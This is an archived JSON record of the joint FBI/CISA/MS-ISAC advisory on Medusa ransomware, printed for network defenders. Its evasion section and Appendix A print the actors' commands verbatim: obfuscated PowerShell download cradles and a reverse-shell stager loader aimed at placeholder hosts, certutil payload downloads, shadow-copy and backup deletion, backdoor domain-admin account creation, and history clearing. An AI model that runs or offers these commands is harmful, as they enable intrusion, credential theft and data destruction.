{
	"id": "f99eda88-967f-4073-9a5d-71299cf994fb",
	"created_at": "2026-04-06T00:10:06.077501Z",
	"updated_at": "2026-04-10T03:21:25.765321Z",
	"deleted_at": null,
	"sha1_hash": "4cba649b032a613ba5d37cfa0e2b84f9d9f7e121",
	"title": "#StopRansomware: Medusa Ransomware | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 192041,
	"plain_text": "#StopRansomware: Medusa Ransomware | CISA\r\nPublished: 2025-03-12 · Archived: 2026-04-05 14:24:39 UTC\r\n1. Mitigate known vulnerabilities by ensuring operating systems, software, and firmware are patched and up\r\nto date within a risk-informed span of time.\r\n2. Segment networks to restrict lateral movement from initial infected devices and other devices in the same\r\norganization.\r\n3. Filter network traffic by preventing unknown or untrusted origins from accessing remote services on\r\ninternal systems.\r\n \r\nSummary\r\nNote: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for\r\nnetwork defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware\r\nadvisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of\r\ncompromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all\r\n#StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.\r\nThe Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the\r\nMulti-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate\r\nknown Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025. \r\nMedusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa\r\ndevelopers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with\r\naffected industries including medical, education, legal, insurance, technology, and manufacturing. 
The Medusa\r\nransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the\r\nFBI’s investigation.\r\nFBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section\r\nof this advisory to reduce the likelihood and impact of Medusa ransomware incidents.\r\nDownload the PDF version of this report:\r\nFor a downloadable list of IOCs, see:\r\nTechnical Details\r\nNote: This advisory uses the MITRE ATT\u0026CK® Matrix for Enterprise framework, version 16. See the MITRE\r\nATT\u0026CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to\r\nMITRE ATT\u0026CK tactics and techniques.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 1 of 14\n\nBackground\r\nThe RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally\r\noperated as a closed ransomware variant, meaning all development and associated operations were controlled by\r\nthe same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important\r\noperations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers\r\nand affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they\r\nencrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.\r\nInitial Access\r\nMedusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to\r\nobtain initial access [TA0001 ] to potential victims. Potential payments between $100 USD and $1 million USD\r\nare offered to these affiliates with the opportunity to work exclusively for Medusa. 
Medusa IABs (affiliates) are\r\nknown to make use of common techniques, such as:\r\nPhishing campaigns as a primary method for stealing victim credentials [T1566 ].\r\nExploitation of unpatched software vulnerabilities [T1190 ] through Common Vulnerabilities and\r\nExposures (CVEs) such as the ScreenConnect vulnerability CVE-2024-1709 [CWE-288: Authentication\r\nBypass Using an Alternate Path or Channel ] and Fortinet EMS SQL injection vulnerability CVE-2023-48788\r\n[CWE 89: SQL Injection ].\r\nDiscovery\r\nMedusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network\r\nScanner for initial user, system, and network enumeration. Once a foothold in a victim network is established,\r\ncommonly scanned ports include:\r\n21 (FTP)\r\n22 (SSH)\r\n23 (Telnet)\r\n80 (HTTP)\r\n115 (SFTP)\r\n443 (HTTPS)\r\n1433 (SQL database)\r\n3050 (Firebird database)\r\n3128 (HTTP web proxy)\r\n3306 (MySQL database)\r\n3389 (RDP)\r\nMedusa actors primarily use PowerShell [T1059.001 ] and the Windows Command Prompt (cmd.exe)\r\n[T1059.003 ] for network [T1046 ] and filesystem enumeration [T1083 ] and to utilize Ingress Tool Transfer\r\ncapabilities [T1105 ]. Medusa actors use Windows Management Instrumentation (WMI) [T1047 ] for querying\r\nsystem information.\r\nDefense Evasion\r\nMedusa actors use LOTL to avoid detection [TA0005 ]. (See Appendix A for associated shell commands\r\nobserved during FBI investigations of Medusa victims.) Certutil ( certutil.exe ) is used to avoid detection when\r\nperforming file ingress.\r\nActors have been observed using several different PowerShell detection evasion techniques with increasing\r\ncomplexity, which are provided below. 
Additionally, Medusa actors attempt to cover their tracks by deleting the\r\nPowerShell command line history [T1070.003 ].\r\nIn this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command\r\n[T1027.013 ] using specific execution settings.\r\npowershell -exec bypass -enc \u003cbase64 encrypted command string\u003e\r\nIn another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable\r\n[T1027 ].\r\npowershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object\r\nNet.WebClient).$x.Invoke(http://\u003cip\u003e/\u003cRAS tool\u003e.msi)\r\nIn the final example, the payload is an obfuscated base64 string read into memory, decompressed from  gzip , and\r\nused to create a  scriptblock . The base64 payload is split using empty strings and concatenation, and uses a\r\nformat operator ( -f ) followed by three arguments to specify character replacements in the base64 payload.\r\npowershell -nop -w hidden -noni -ep bypass \u0026([scriptblock]::create((\r\nNew-Object System.IO.StreamReader(\r\nNew-Object System.IO.Compression.GzipStream((\r\nNew-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(\r\n(('\u003cbase64 payload string\u003e')-f'\u003ccharacter replacement 0\u003e','\u003ccharacter replacement 1\u003e',\r\n'\u003ccharacter replacement 2\u003e')))),\r\n[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))\r\nThe obfuscated base64 PowerShell payload is identical to powerfun.ps1 , a publicly available stager script that\r\ncan create either a reverse or bind shell over TLS to load additional modules. 
In the bind shell, the script awaits a\r\nconnection on local port 443 [T1071.001 ], and initiates a connection to a remote port 443 in the reverse\r\nshell.\r\nIn some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection\r\nand response (EDR) tools [T1562.001 ].\r\nFBI has observed Medusa actors using the following tools to support command and control (C2) and evade\r\ndetection:\r\nLigolo.\r\nA reverse tunneling tool often used to create secure connections between a compromised host and\r\nthreat actor’s machine.\r\nCloudflared.\r\nFormerly known as ArgoTunnel.\r\nUsed to securely expose applications, services, or servers to the internet via Cloudflare Tunnel\r\nwithout exposing them directly.\r\nLateral Movement and Execution\r\nMedusa actors use a variety of legitimate remote access software [T1219 ]; they may tailor their choice based on\r\nany remote access tools already present in the victim environment as a means of evading detection. Investigations\r\nidentified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ\r\nDeploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote\r\nDesktop Protocol (RDP) [T1021.001 ] and PsExec [T1569.002 ]—to move laterally [TA0008 ] through the\r\nnetwork and identify files for exfiltration [TA0010 ] and encryption [T1486 ]. 
When provided with valid\r\nusername and password credentials, Medusa actors use PsExec to:\r\nCopy ( -c ) one script from various batch scripts on the current machine to the remote machine and\r\nexecute it with SYSTEM level privileges ( -s ).\r\nExecute an already existing local file on a remote machine with SYSTEM level privileges.\r\nExecute remote shell commands using cmd /c .\r\nOne of the batch scripts executed by PsExec is openrdp.bat , which first creates a new firewall rule to allow\r\ninbound TCP traffic on port 3389 :\r\nnetsh advfirewall firewall add rule name=\"rdp\" dir=in protocol=tcp localport=3389\r\naction=allow\r\nThen, a rule to allow remote WMI connections is created:\r\nnetsh advfirewall firewall set rule group=\"windows management instrumentation (wmi)\" new\r\nenable=yes\r\nFinally, the registry is modified to allow Remote Desktop connections:\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t\r\nREG_DWORD /d 0 /f\r\nMimikatz has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping\r\n[T1003.001 ] to harvest credentials [TA0006 ] and aid lateral movement.\r\nExfiltration and Encryption\r\nMedusa actors install and use Rclone to facilitate exfiltration of data to the Medusa C2 servers [T1567.002 ]\r\nused by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [T1072 ] to deploy the\r\nencryptor, gaze.exe , on files across the network—with the actors disabling Windows Defender and other\r\nantivirus services on specific targets. Encrypted files have a .medusa file extension. The process gaze.exe\r\nterminates all services [T1489 ] related to backups, security, databases, communication, file sharing and\r\nwebsites, then deletes shadow copies [T1490 ] and encrypts files with AES-256 before dropping the ransom\r\nnote. 
The actors then manually turn off [T1529 ] and encrypt virtual machines and delete their previously\r\ninstalled tools [T1070 ].\r\nExtortion\r\nMedusa RaaS employs a double extortion model, where victims must pay [T1657 ] to decrypt files and prevent\r\nfurther release. The ransom note demands victims make contact within 48 hours via either a Tor browser based\r\nlive chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the\r\nransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a  .onion data\r\nleak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on\r\nthe site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently\r\nadvertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay\r\n$10,000 USD in cryptocurrency to add a day to the countdown timer.\r\nFBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor\r\nwho claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made\r\nagain to provide the “true decryptor”— potentially indicating a triple extortion scheme.\r\nIndicators of Compromise\r\nTable 1 lists the hashes of malicious files obtained during investigations.\r\nTable 1: Malicious Files\r\nFiles Hash (MD5) Description\r\n!!!READ_ME_MEDUSA!!!.txt Redacted Ransom note file\r\nopenrdp.bat 44370f5c977e415981febf7dbb87a85c\r\nAllows incoming RDP and\r\nremote WMI connections\r\npu.exe 80d852cd199ac923205b61658a9ec5bc Reverse shell\r\nTable 2 includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom\r\nnegotiation and contacting victims following compromise. 
These email addresses are not associated with phishing\r\nactivity conducted by Medusa actors.\r\nTable 2: Medusa Email Addresses\r\nEmail Addresses Description\r\nkey.medusa.serviceteam@protonmail.com Used for ransom negotiation\r\nmedusa.support@onionmail.org Used for ransom negotiation\r\nmds.svt.breach@protonmail.com Used for ransom negotiation\r\nmds.svt.mir2@protonmail.com Used for ransom negotiation\r\nMedusaSupport@cock.li Used for ransom negotiation\r\nMITRE ATT\u0026CK Tactics and Techniques\r\nSee Table 3 – Table 11 for all referenced threat actor tactics and techniques in this advisory. For assistance with\r\nmapping malicious cyber activity to the MITRE ATT\u0026CK framework, see CISA and MITRE ATT\u0026CK’s Best\r\nPractices for MITRE ATT\u0026CK Mapping and CISA’s Decider Tool .\r\nTable 3: Initial Access\r\nTechnique Title ID Use\r\nExploit Public-Facing\r\nApplication\r\nT1190\r\nMedusa actors exploited unpatched software or n-day vulnerabilities\r\nthrough common vulnerabilities and exposures.\r\nInitial Access\r\nTA0001 Medusa actors recruited initial access brokers (IABS) in\r\ncybercriminal forums and marketplaces to obtain initial access.\r\nPhishing T1566\r\nMedusa IABS used phishing campaigns as a primary method for\r\ndelivering ransomware to victims.\r\nTable 4: Defense Evasion\r\nTechnique Title ID Use\r\nIndicator Removal: Clear Command\r\nHistory\r\nT1070.003 Medusa actors attempt to cover their tracks by\r\ndeleting the PowerShell command line history.\r\nObfuscated Files or Information:\r\nEncrypted/Encoded File\r\nT1027.013 Medusa actors use a well-known evasion technique\r\nthat executes a base64 encrypted command.\r\nObfuscated Files or Information T1027\r\nMedusa actors obfuscated a string by slicing it into\r\npieces and referencing it via a variable.\r\nIndicator Removal T1070\r\nMedusa actors deleted their 
previous work and tools\r\ninstalled. \r\nImpair Defenses: Disable or Modify\r\nTools\r\nT1562.001 Medusa actors killed or deleted endpoint detection\r\nand response tools.\r\nTable 5: Discovery\r\nTechnique Title ID Use\r\nNetwork Service Discovery T1046\r\nMedusa actors utilized living off the land techniques to\r\nperform network enumeration.\r\nFile and Directory Discovery T1083\r\nMedusa actors utilized Windows Command Prompt for\r\nfilesystem enumeration.\r\nNetwork Share Discovery T1135\r\nMedusa actors queried shared drives on the local system to\r\ngather sources of information.\r\nSystem Network Configuration\r\nDiscovery\r\nT1016\r\nMedusa actors used operating system administrative\r\nutilities to gather network information.\r\nSystem Information Discovery T1082\r\nMedusa actors used the command  systeminfo to gather\r\ndetailed system information.\r\nPermission Groups Discovery:\r\nDomain Groups\r\nT1069.002 Medusa actors attempt to find domain-level group and\r\npermission settings.\r\nTable 6: Credential Access\r\nTechnique Title ID Use\r\nCredential Access TA0006\r\nMedusa actors harvest credentials with tools like Mimikatz to gain\r\naccess to systems.\r\nOS Credential\r\nDumping: LSASS\r\nMemory\r\nT1003.001\r\nMedusa actors were observed accessing credential material stored\r\nin process memory or Local Security Authority Subsystem Service\r\n(LSASS) using Mimikatz.\r\nTable 7: Lateral Movement and Execution\r\nTechnique Title ID Use\r\nLateral Movement TA0008\r\nMedusa actors performed techniques to move laterally\r\nwithout detection once they gained initial access.\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nT1059.001\r\nMedusa actors used PowerShell, a powerful interactive\r\ncommand-line interface and scripting environment for\r\ningress, network, and filesystem enumeration.\r\nCommand and Scripting\r\nInterpreter: 
Windows\r\nCommand Shell\r\nT1059.003\r\nMedusa actors used Windows Command Prompt—which\r\ncan be used to control almost any aspect of a system—for\r\ningress, network, and filesystem enumeration. \r\nSoftware Deployment Tools T1072\r\nMedusa Actors used PDQ Deploy and BigFix to deploy the\r\nencryptor on files across the network.\r\nRemote Services: Remote\r\nDesktop Protocol\r\nT1021.001\r\nMedusa actors used Remote Desktop Protocol (RDP), a\r\ncommon feature in operating systems, to log into an\r\ninteractive session with a system and move laterally.\r\nSystem Services\r\nT1569.002 Medusa actors used Sysinternals PsExec to deploy the\r\nencryptor on files across the network.\r\nWindows Management\r\nInstrumentation\r\nT1047\r\nMedusa actors abused Windows Management\r\nInstrumentation to query system information.\r\nTable 8: Exfiltration and Encryption\r\nTechnique Title  ID Use\r\nExfiltration TA0010\r\nMedusa actors identified files to exfiltrate out of\r\nvictim networks.\r\nExfiltration Over Web Service:\r\nExfiltration to Cloud Storage\r\nT1567.002 Medusa actors used Rclone to facilitate exfiltration\r\nof data to the Medusa C2 servers.\r\nTable 9: Command and Control\r\nTechnique Title ID Use\r\nIngress Tool Transfer T1105\r\nMedusa actors used PowerShell, Windows Command Prompt, and\r\ncertutil for file ingress.\r\nApplication Layer\r\nProtocol: Web\r\nProtocols \r\nT1071.001\r\nMedusa actors communicate using application layer protocols\r\nassociated with web traffic. 
In this case, Medusa actors used scripts\r\nthat created reverse or bind shells over port 443 : HTTPS.\r\nRemote Access\r\nSoftware\r\nT1219\r\nMedusa actors used remote access software to move laterally through\r\nthe network.\r\nTable 10: Persistence\r\nTechnique\r\nTitle\r\nID Use\r\nCreate Account\r\nT1136.002 Medusa actors created a domain account to maintain access to victim\r\nsystems.\r\nTable 11: Impact\r\nTechnique Title ID Use\r\nData Encrypted for\r\nImpact\r\nT1486 Medusa identified and encrypted data on target systems to interrupt\r\navailability to system and network resources.\r\nInhibit System\r\nRecovery\r\nT1490 The process  gaze.exe terminates all services then deletes shadow\r\ncopies and encrypts files with AES-256 before dropping the ransom note.\r\nFinancial Theft\r\nT1657 Victims must pay to decrypt files and prevent further release by Medusa\r\nactors.\r\nSystem\r\nShutdown/Reboot\r\nT1529\r\nMedusa actors manually turned off and encrypted virtual machines.\r\nService Stop\r\nT1489 The process  gaze.exe terminates all services related to backups,\r\nsecurity, databases, communication, file sharing, and websites.\r\nMitigations\r\nFBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve cybersecurity\r\nposture based on threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance\r\nGoals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs\r\nprovide a minimum set of practices and protections that CISA and NIST recommend all organizations implement.\r\nCISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most\r\ncommon and impactful threats, tactics, techniques, and procedures. 
Visit CISA’s CPGs webpage for more\r\ninformation on the CPGs, including additional recommended baseline protections.\r\nImplement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and\r\nservers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud)\r\n[CPG 2.F, 2.R, 2.S].\r\nRequire all accounts with password logins (e.g., service accounts, admin accounts, and domain admin\r\naccounts) to comply with NIST’s standards. In particular, require employees to use long passwords and\r\nconsider not requiring frequently recurring password changes, as these can weaken security [CPG 2.C].\r\nRequire multifactor authentication for all services to the extent possible, particularly for webmail,\r\nvirtual private networks, and accounts that access critical systems [CPG 2.H].\r\nKeep all operating systems, software, and firmware up to date. Timely patching is one of the most\r\nefficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\r\nPrioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].\r\nSegment networks to prevent the spread of ransomware. Network segmentation can help prevent the\r\nspread of ransomware by controlling traffic flows between—and access to—various subnetworks and by\r\nrestricting adversary lateral movement [CPG 2.F].\r\nIdentify, detect, and investigate abnormal activity and potential traversal of the indicated\r\nransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool\r\nthat logs and reports all network traffic, including lateral movement activity on a network. 
Endpoint\r\ndetection and response (EDR) tools are particularly useful for detecting lateral connections as they have\r\ninsight into common and uncommon network connections for each host [CPG 3.A].\r\nRequire VPNs or Jump Hosts for remote access.\r\nMonitor for unauthorized scanning and access attempts.\r\nFilter network traffic by preventing unknown or untrusted origins from accessing remote services on\r\ninternal systems. This prevents threat actors from directly connecting to remote access services that they\r\nhave established for persistence.\r\nAudit user accounts with administrative privileges and configure access controls according to the\r\nprinciple of least privilege [CPG 2.E].\r\nReview domain controllers, servers, workstations, and active directories for new and/or unrecognized\r\naccounts [CPG 1.A, 2.O].\r\nDisable command-line and scripting activities and permissions. Privilege escalation and lateral\r\nmovement often depend on software utilities running from the command line. If threat actors are not able\r\nto run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E, 2.N].\r\nDisable unused ports [CPG 2.V].\r\nMaintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By\r\ninstituting this practice, the organization helps ensure they will not be severely interrupted and/or only have\r\nirretrievable data.\r\nEnsure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire\r\norganization’s data infrastructure [CPG 2.K, 2.L, 2.R].\r\nValidate Security Controls\r\nIn addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating\r\nyour organization’s security program against the threat behaviors mapped to the MITRE ATT\u0026CK Matrix for\r\nEnterprise framework in this advisory. 
The FBI, CISA, and MS-ISAC recommend testing your existing security\r\ncontrols inventory to assess how they perform against the ATT\u0026CK techniques described in this advisory.\r\nTo get started:\r\n1. Select an ATT\u0026CK technique described in this advisory (Table 3 to Table 11).\r\n2. Align your security technologies against the technique.\r\n3. Test your technologies against the technique.\r\n4. Analyze your detection and prevention technologies’ performance.\r\n5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\r\n6. Tune your security program, including people, processes, and technologies, based on the data generated by\r\nthis process.\r\nThe FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production\r\nenvironment to ensure optimal performance against the MITRE ATT\u0026CK techniques identified in this advisory.\r\nResources\r\nJoint #StopRansomware Guide.\r\nJoint Guide Identifying and Mitigating Living Off the Land Techniques.\r\nJoint Guide to Securing Remote Access Software.\r\nReporting\r\nYour organization has no obligation to respond or provide information back to FBI in response to this joint\r\nadvisory. 
If, after reviewing the information provided, your organization decides to provide information to FBI,\r\nreporting must be consistent with applicable state and federal laws.\r\nFBI is interested in any information that can be shared, to include boundary logs showing communication to and\r\nfrom foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information,\r\ndecryptor files, and/or a benign sample of an encrypted file.\r\nAdditional details of interest include a targeted company point of contact, status and scope of infection, estimated\r\nloss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and\r\nnetwork-based indicators.\r\nThe FBI, CISA, and MS-ISAC do not encourage paying ransoms as payment does not guarantee victim files will\r\nbe recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage\r\nother criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of\r\nwhether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to\r\npromptly report ransomware incidents to FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office,\r\nor CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov ) or by\r\ncalling 1-844-Say-CISA (1-844-729-2472).\r\nDisclaimer\r\nThe information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or\r\nservices linked within this document. 
Any reference to specific commercial entities, products, processes, or\r\nservices by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement,\r\nrecommendation, or favoring by the FBI, CISA, and MS-ISAC.\r\nAcknowledgements\r\nConnectWise contributed to this advisory.\r\nVersion History\r\nMarch 12, 2025: Initial version.\r\nAppendix A: Medusa Commands\r\nThese commands explicitly demonstrate the methods used by Medusa threat actors once they obtain a foothold\r\ninside a victim network. Incident responders and threat hunters can use this information to detect malicious\r\nactivity. System administrators can use this information to design allowlist/denylist policies or other protective\r\nmechanisms.\r\ncmd.exe /c certutil -f urlcache https://\u003cdomain\u003e/\u003cremotefile\u003e.css \u003clocalfile\u003e.dll\r\ncmd.exe /c certutil -f urlcache https://\u003cdomain\u003e/\u003cremotefile\u003e.msi \u003clocalfile\u003e.msi\r\ncmd.exe /c driverquery\r\ncmd.exe /c echo Computer: %COMPUTERNAME% \u0026 `\r\necho Username: %USERNAME% \u0026 `\r\necho Domain: %USERDOMAIN% \u0026 `\r\necho Logon Server: %LOGONSERVER% \u0026 `\r\necho DNS Domain: %USERDNSDOMAIN% \u0026 `\r\necho User Profile: %USERPROFILE% \u0026 echo `\r\nSystem Root: %SYSTEMROOT%\r\ncmd.exe /c ipconfig /all [T1016 ]\r\ncmd.exe /c net share [T1135 ]\r\ncmd.exe /c net use\r\ncmd.exe /c netstat -a\r\ncmd.exe /c sc query\r\ncmd.exe /c schtasks\r\ncmd.exe /c systeminfo [T1082 ]\r\ncmd.exe /c ver\r\ncmd.exe /c wmic printer get caption,name,deviceid,drivername,portname\r\ncmd.exe /c wmic printjob\r\nmmc.exe compmgmt.msc /computer:{hostname/ip}\r\nmstsc.exe /v:{hostname/ip}\r\nmstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}\r\npowershell -exec bypass -enc \u003cbase64 encrypted command string\u003e\r\npowershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression 
(New-Object\r\nNet.WebClient).$x.Invoke(http://\u003cip\u003e/\u003cRMM tool\u003e.msi)\r\npowershell -nop -w hidden -noni -ep bypass \u0026([scriptblock]::create((\r\nNew-Object System.IO.StreamReader(\r\nNew-Object System.IO.Compression.GzipStream((\r\nNew-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(\r\n(('\u003cbase64 payload string\u003e')-f'\u003ccharacter replacement 0\u003e',\r\n'\u003ccharacter replacement 1\u003e','\u003ccharacter replacement 2\u003e')))),\r\n[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))\r\npowershell Remove-Item (Get-PSReadlineOption).HistorySavePath\r\npowershell Get-ADComputer -Filter * -Property * | Select-Object\r\nName,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate,\r\nlogonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path \u003cfile path\u003e \r\n-NoTypeInformation -Encoding UTF8\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} \"c:\\windows\\system32\\taskkill.exe\" /f /im WRSA.exe\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -c coba.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -c openrdp.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -c StopAllProcess.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -c zam.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} c:\\temp\\x.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} cmd\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} cmd /c   \"c:\\gaze.exe\"\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} cmd /c  \"copy \\\\ad02\\sysvol\\gaze.exe c:\\gaze.exe\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} cmd /c  \"copy \\\\ad02\\sysvol\\gaze.exe c:\\gaze.exe \u0026\u0026\r\nc:\\gaze.exe\"\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -u {user} -p {pass} -c coba.bat\r\npsexec.exe -accepteula -nobanner -s 
\\\\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -u {user} -p {pass} -c openrdp.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -u {user} -p {pass} -c zam.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -u {user} -p {pass} cmd\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -u {user} -p {pass} -с newuser.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с duooff.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с hostname/ipwho.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с newuser.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с removesophos.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с start.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с uninstallSophos.bat\r\nnltest /dclist:\r\nnet group \"domain admins\" /domain [T1069.002 ]\r\nnet group \"Domain Admins\" default /add /domain\r\nnet group \"Enterprise Admins\" default /add /domain\r\nnet group \"Remote Desktop Users\" default /add /domain\r\nnet group \"Group Policy Creator Owners\" default /add /domain\r\nnet group \"Schema Admins\" default /add /domain\r\nnet group \"domain users\" /domain\r\nnet user default /active:yes /domain\r\nnet user /add default \u003cpassword\u003e /domain [T1136.002 ]\r\nquery user\r\nreg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0\r\nsysteminfo\r\nvssadmin.exe Delete Shadows /all /quiet\r\nvssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded\r\ndel /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBackup*.* %sbackup*.* %s*.set %s*.win\r\n%s*.dsk\r\nnetsh advfirewall firewall add rule name=\"rdp\" dir=in protocol=tcp localport=3389 action=allow\r\nnetsh advfirewall firewall set rule group=\"windows management instrumentation (wmi)\" new 
enable=yes\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t\r\nREG_DWORD /d 0 /f\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a"
	],
	"report_names": [
		"aa25-071a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434206,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4cba649b032a613ba5d37cfa0e2b84f9d9f7e121.pdf",
		"text": "https://archive.orkl.eu/4cba649b032a613ba5d37cfa0e2b84f9d9f7e121.txt",
		"img": "https://archive.orkl.eu/4cba649b032a613ba5d37cfa0e2b84f9d9f7e121.jpg"
	}
}